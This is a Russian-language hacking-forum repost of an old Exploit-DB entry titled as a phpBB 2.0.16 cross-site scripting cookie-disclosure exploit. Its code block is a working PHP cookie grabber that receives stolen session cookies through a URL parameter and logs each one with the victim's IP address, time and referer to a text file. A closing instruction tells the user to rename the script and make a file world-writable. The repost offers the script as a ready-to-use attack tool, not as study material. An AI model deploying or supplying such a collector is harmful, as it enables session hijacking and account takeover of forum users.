Exploit phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (Cookie Grabber)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
1103
Проверка EDB
  1. Пройдено
Автор
SJAAK RAKE
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2005-07-13
Код:
// Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

//rename it to cookies.php and create one new file steal.php and chmod it to 777

# milw0rm.com [2005-07-13]
 
Источник
www.exploit-db.com

Похожие темы